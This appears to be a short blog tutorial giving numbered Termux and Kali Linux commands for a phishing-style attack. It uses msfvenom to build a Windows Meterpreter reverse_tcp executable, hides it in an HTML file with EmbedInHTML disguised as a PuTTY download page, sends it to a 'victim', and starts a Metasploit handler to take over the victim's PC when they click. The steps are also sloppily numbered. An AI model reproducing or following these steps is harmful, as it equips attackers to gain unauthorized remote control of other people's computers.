embled html and advanced metasploit tamilcode

                 WELCOME TO TAMILCODE


HERE IS TRICKS AND TECHNOLOGY





 

                        TERMUX  AND KALI LINUX COMMANDS




STEP 1    apt update


STEP 2   pkg install git


STEP 3   pkg install python


STEP 4   git clone https://github.com/Arno0x/EmbedInHTML.git


STEP 5  cd EmbedInHTML.git


STEP 6  ls


STEP 7  python  EmbedInHTML



STEP 8  create the payload using the msfvenom



STEP 9  msfvenom -p windows/meterpreter/reverse_tcp LHOST= yourip LPORT= portnumber -f exe>filename.exe 


STEP 10 now your payload is ready


STEP 11  embedInHTML.py -k tamilcode  -f  tamilcode.exe -o tamilcode.html



example embedInHTML.py -k your password -f  payload name  -o testing.html

now your file will be ready









STEP 11  your file will be the located output folder




STEP 12  copy the location of the file




STEP 13  copy the location of file and paste in the index.html (putty folder)



STEP 14  and save the file and to victim 

AND START METASPLOIT using the msfconsole




STEP 15    use exploit/multi/handler



STEP 14    set payload windows/meterpreter/reverse_tcp



STEP 15     set LHOST yourip



STEP 16    set LPORT portnumber


STEP 17    run




WHEN THE VICTIM CLICK THE HERE YOU CAN ACCESS  THE PC



YOUR ARE THE VISUAL LEANER PLEASE  SEE VIDEO HERE

        

Post a Comment

0 Comments